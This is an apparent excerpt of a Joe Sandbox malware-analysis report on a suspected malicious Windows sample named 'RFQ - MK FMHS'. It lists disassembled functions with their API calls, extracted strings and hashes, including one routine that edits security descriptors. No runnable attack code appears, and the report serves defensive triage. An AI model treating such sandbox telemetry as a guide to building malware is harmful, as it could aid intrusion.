                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: 4029e9f1d0590c9a3a21aa40d4a3686582ec1da9e4893868e27b095be8ad10e0
                    • Instruction ID: ccc5474f2528179d4bae3ac2807d2855e31ef4e2d03017753259e918e2d5b5e6
                    • Opcode Fuzzy Hash: 4029e9f1d0590c9a3a21aa40d4a3686582ec1da9e4893868e27b095be8ad10e0
                    • Instruction Fuzzy Hash: AF31C831948315A6DF18FA60DE43FEE77E89F10750F60502DF845720E1EF92AE05D552
                    Function 00ECC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000063), ref: 00ECC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ECC4E6
                    • SetWindowTextW.USER32(?,?), ref: 00ECC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 00ECC512
                    • SetWindowTextW.USER32(00000000,?), ref: 00ECC518
                    • GetDlgItem.USER32(?,000003E9), ref: 00ECC528
                    • SetWindowTextW.USER32(00000000,?), ref: 00ECC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ECC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ECC569
                    • GetWindowRect.USER32(?,?), ref: 00ECC572
                    • SetWindowTextW.USER32(?,?), ref: 00ECC5DD
                    • GetDesktopWindow.USER32 ref: 00ECC5E3
                    • GetWindowRect.USER32(00000000), ref: 00ECC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ECC636
                    • GetClientRect.USER32(?,?), ref: 00ECC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ECC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ECC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: 8cc92b1d9952fa52aca60a31d0deefc370a14e70d20925973a52325a3c7eb3f4
                    • Instruction ID: b237d1741d5af3ffbe4ac025e6893422987c36dccd1a61db6b269148fd45acfd
                    • Opcode Fuzzy Hash: 8cc92b1d9952fa52aca60a31d0deefc370a14e70d20925973a52325a3c7eb3f4
                    • Instruction Fuzzy Hash: B4517C70900709AFDB209FA9CE85F6EBBF5FF44708F10492CE686B25A0CB75A945CB40
                    Function 00EFA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EFA4C8
                    • DestroyWindow.USER32(?,?), ref: 00EFA542
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EFA5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EFA5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA5F1
                    • DestroyWindow.USER32(00000000), ref: 00EFA613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E70000,00000000), ref: 00EFA64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA663
                    • GetDesktopWindow.USER32 ref: 00EFA67C
                    • GetWindowRect.USER32(00000000), ref: 00EFA683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EFA69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EFA6B3
                      • Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: 7fca8ac0170e8c5584eaaff12b0af90d26ba191b84216e69257fe45c47b63bc9
                    • Instruction ID: 0ae913a5509fe34183f82f91d4888fbed1772d3d65c0f93d75b26d48bb8d1e07
                    • Opcode Fuzzy Hash: 7fca8ac0170e8c5584eaaff12b0af90d26ba191b84216e69257fe45c47b63bc9
                    • Instruction Fuzzy Hash: 18716BB1140209AFD720CF28C845F767BE6EF88304F09452DFA89EB2A1DB70E905DB56
                    Function 00EFC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • DragQueryPoint.SHELL32(?,?), ref: 00EFC917
                      • Part of subcall function 00EFADF1: ClientToScreen.USER32(?,?), ref: 00EFAE1A
                      • Part of subcall function 00EFADF1: GetWindowRect.USER32(?,?), ref: 00EFAE90
                      • Part of subcall function 00EFADF1: PtInRect.USER32(?,?,00EFC304), ref: 00EFAEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EFC980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EFC98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EFC9AE
                    • _wcscat.LIBCMT ref: 00EFC9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EFC9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EFCA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCA47
                    • DragFinish.SHELL32(?), ref: 00EFCA4E
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EFCB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 169749273-3440237614
                    • Opcode ID: 128bdf6d343e89b9acf6c46cc973adf0b92b73a984f01b78cf614957ab6654e1
                    • Instruction ID: 137ad8aec1931496ff0bae534e077eea30b3c7a5aa02d4b18a17b1bfe5f1c222
                    • Opcode Fuzzy Hash: 128bdf6d343e89b9acf6c46cc973adf0b92b73a984f01b78cf614957ab6654e1
                    • Instruction Fuzzy Hash: D7617A71108304AFC711EF60DC85DAFBBE8EFC8710F10492EF695A61A1DB709A49CB92
                    Function 00EF4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00EF46AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 2607bb71d6c80fe4ce4232bc002547542b6f10a625e285194430ace6c0eb1442
                    • Instruction ID: d8c7500b85dc4d00ed289c39d4aee52f61d180cb774cafb87f14dc696f029277
                    • Opcode Fuzzy Hash: 2607bb71d6c80fe4ce4232bc002547542b6f10a625e285194430ace6c0eb1442
                    • Instruction Fuzzy Hash: 6D9169742043059FCB14EF20C451A6AB7E1AF84314F05A86DF99A7B3A3DB31ED4ACB81
                    Function 00EFBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EFBB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00EF6D80,?), ref: 00EFBBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EFBC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EFBC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EFBC7D
                    • FreeLibrary.KERNEL32(?), ref: 00EFBC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EFBC99
                    • DestroyIcon.USER32(?), ref: 00EFBCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EFBCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EFBCD1
                      • Part of subcall function 00E9313D: __wcsicmp_l.LIBCMT ref: 00E931C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 82c7ce416a7d0a19d2f2acfbdec8b4d5f49be5c7f2c04ae64e756f2419410651
                    • Instruction ID: 08ae7f39b066d29435036b02151185ab5f3ae16d2b287dc185b897f9bf469184
                    • Opcode Fuzzy Hash: 82c7ce416a7d0a19d2f2acfbdec8b4d5f49be5c7f2c04ae64e756f2419410651
                    • Instruction Fuzzy Hash: 0A61CF71500219BEEF14DF65CC85FBABBA8EF08710F10911AFE15E61D1DB74AA94CBA0
                    Function 00EDA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • CharLowerBuffW.USER32(?,?), ref: 00EDA636
                    • GetDriveTypeW.KERNEL32 ref: 00EDA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDA730
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: e45210eca7affb57c68abcf6393382d195b8c0a042c74b067cb28af854c8eb6e
                    • Instruction ID: 1b80546c7905b8d68cdd23b6605886b6fa0f0e03c284c57139d2eb2845f5a65a
                    • Opcode Fuzzy Hash: e45210eca7affb57c68abcf6393382d195b8c0a042c74b067cb28af854c8eb6e
                    • Instruction Fuzzy Hash: B7515E711043059FC700EF24D98196AB7F4FF98718F14996DF89A672A2DB31EE0ACB52
                    Function 00EDA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EDA47A
                    • __swprintf.LIBCMT ref: 00EDA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EDA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EDA4FE
                    • _memset.LIBCMT ref: 00EDA51D
                    • _wcsncpy.LIBCMT ref: 00EDA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EDA58E
                    • CloseHandle.KERNEL32(00000000), ref: 00EDA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 00EDA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 00EDA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: b7713f8d4214d3dc3eb9c10949d8220190f269b8133bf180e4da28d8b5d460f9
                    • Instruction ID: 165c6989963925740e325f786886101cd26733c84bae6de45de172a7f9601241
                    • Opcode Fuzzy Hash: b7713f8d4214d3dc3eb9c10949d8220190f269b8133bf180e4da28d8b5d460f9
                    • Instruction Fuzzy Hash: 9E31AEB650020AABDB219FA1DC48FFB33BCEF88705F1451B6F908E6160E77097458B25
                    Function 00EAAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                    • String ID:
                    • API String ID: 884005220-0
                    • Opcode ID: 06db960ddd2f1b65b2e0f9d8a477ec5f15c76b58c1ac70e5ac11280978034adc
                    • Instruction ID: 69aabd74fd31051de67460abd65d46bb528ec76875865d73b228f3a6a3b42feb
                    • Opcode Fuzzy Hash: 06db960ddd2f1b65b2e0f9d8a477ec5f15c76b58c1ac70e5ac11280978034adc
                    • Instruction Fuzzy Hash: 1161E372504305AFEB116F24D841B6977E5EB1A739F186139E801BF191DB34F940C762
                    Function 00EFC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EFC4EC
                    • GetFocus.USER32 ref: 00EFC4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 00EFC507
                    • _memset.LIBCMT ref: 00EFC632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EFC65D
                    • GetMenuItemCount.USER32(?), ref: 00EFC67D
                    • GetMenuItemID.USER32(?,00000000), ref: 00EFC690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EFC6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EFC70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EFC744
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EFC779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: cd03c0323238ea401266ce8cb7d484e96d996a5d4319f49b8626bc208bacfb81
                    • Instruction ID: 0db9ba8d7ff0dc20299cd98c2347d7d4fcf896c0a9253ba57b99ea22921e3adc
                    • Opcode Fuzzy Hash: cd03c0323238ea401266ce8cb7d484e96d996a5d4319f49b8626bc208bacfb81
                    • Instruction Fuzzy Hash: DA817E70508309AFD710DF24CA84A7ABBE4FF88758F20592EFA95E7291D730D905CB92
                    Function 00EC83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
                      • Part of subcall function 00EC874A: GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
                      • Part of subcall function 00EC874A: GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
                      • Part of subcall function 00EC874A: HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
                      • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D
                      • Part of subcall function 00EC87E7: GetProcessHeap.KERNEL32(00000008,00EC8240,00000000,00000000,?,00EC8240,?), ref: 00EC87F3
                      • Part of subcall function 00EC87E7: HeapAlloc.KERNEL32(00000000,?,00EC8240,?), ref: 00EC87FA
                      • Part of subcall function 00EC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8240,?), ref: 00EC880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC8458
                    • _memset.LIBCMT ref: 00EC846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC848C
                    • GetLengthSid.ADVAPI32(?), ref: 00EC849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00EC84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC84F6
                    • GetLengthSid.ADVAPI32(?), ref: 00EC8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8522
                    • HeapAlloc.KERNEL32(00000000), ref: 00EC8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC854A
                    • CopySid.ADVAPI32(00000000), ref: 00EC8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 0bd8828145518d55b696a257bd090ae756cf68d21e84baec52270acc1d4a4d59
                    • Instruction ID: be1b65f47c1020efd1684c5baa67a75548ef60e1994f7e875b2d79b9e2cbc9bd
                    • Opcode Fuzzy Hash: 0bd8828145518d55b696a257bd090ae756cf68d21e84baec52270acc1d4a4d59
                    • Instruction Fuzzy Hash: F9613871900219AFDF109FA5DE45EAEBBB9FF48304F048169E815B7291DB729A06CF60
                    Function 00EE762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 00EE76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EE76AE
                    • CreateCompatibleDC.GDI32(?), ref: 00EE76BA
                    • SelectObject.GDI32(00000000,?), ref: 00EE76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EE771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EE7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EE777B
                    • SelectObject.GDI32(00000006,?), ref: 00EE7783
                    • DeleteObject.GDI32(?), ref: 00EE778C
                    • DeleteDC.GDI32(00000006), ref: 00EE7793
                    • ReleaseDC.USER32(00000000,?), ref: 00EE779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 6ce9abad263abcd1b74e0580debaf20e6243c360ffdce1a3543eccc5047e7880
                    • Instruction ID: dac800ad4847e569d859dac71e2f96a421cfb37db70b4db3b4ed6fc85fa702e4
                    • Opcode Fuzzy Hash: 6ce9abad263abcd1b74e0580debaf20e6243c360ffdce1a3543eccc5047e7880
                    • Instruction Fuzzy Hash: 1B516B75904349EFCB15CFA9CC84EAEBBB9EF48710F14852EF999A7210D731A944CB60
                    Function 00EDA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                    Download Yara Rule
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,00EFFB78), ref: 00EDA0FC
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EDA11E
                    • __swprintf.LIBCMT ref: 00EDA177
                    • __swprintf.LIBCMT ref: 00EDA190
                    • _wprintf.LIBCMT ref: 00EDA246
                    • _wprintf.LIBCMT ref: 00EDA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 311963372-2391861430
                    • Opcode ID: fc8c86c4d76672416d1cc2f9d7cf917b3be4d316228278bbc2625fae06898119
